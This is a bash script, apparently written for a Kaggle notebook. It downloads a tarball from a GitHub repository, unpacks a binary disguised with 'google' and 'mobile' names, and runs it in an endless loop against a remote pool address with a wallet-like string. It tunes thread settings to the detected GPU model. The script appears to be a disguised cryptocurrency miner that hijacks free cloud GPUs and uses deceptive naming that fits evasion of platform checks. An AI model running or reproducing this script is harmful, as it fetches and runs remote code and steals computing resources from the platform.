apt-get install -y libcpprest-dev libgmp-dev libargon2-0-dev

cd /kaggle/working/

wget -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/googleapps84741274.tar.gz
tar -xvf ./googleapps84741274.tar.gz

cd googleapps8474

while true
do

google8474=$(nvidia-smi --query-gpu=name --format=csv,noheader | sed "s/ //g")

if [[ $google8474 == "QuadroP4000" ]]
then

timeout 84 ./google84121274 -p https://mobile841212121274.osc-fr1.scalingo.io -a 2XHCt5awxvHdQyNLv8DukLbCZvEv9Eckv14eQZk94dDXxT8E3chTYRfasn8kn1XcqGFuXA65Qi11do1TsK2pHCM5 -t 20 -b 20
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

else

if [[ $google8474 == "QuadroM4000" ]]
then

timeout 84 ./google84121274 -p https://mobile841212121274.osc-fr1.scalingo.io -a 2XHCt5awxvHdQyNLv8DukLbCZvEv9Eckv14eQZk94dDXxT8E3chTYRfasn8kn1XcqGFuXA65Qi11do1TsK2pHCM5 -t 16 -b 16
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

else

if [[ $google8474 == "QuadroP5000" ]]
then

timeout 84 ./google84121274 -p https://mobile841212121274.osc-fr1.scalingo.io -a 2XHCt5awxvHdQyNLv8DukLbCZvEv9Eckv14eQZk94dDXxT8E3chTYRfasn8kn1XcqGFuXA65Qi11do1TsK2pHCM5 -t 22 -b 22
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

else

timeout 84 ./google84121274 -p https://mobile841212121274.osc-fr1.scalingo.io -a 2XHCt5awxvHdQyNLv8DukLbCZvEv9Eckv14eQZk94dDXxT8E3chTYRfasn8kn1XcqGFuXA65Qi11do1TsK2pHCM5 -t 20 -b 20
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

fi

fi

done
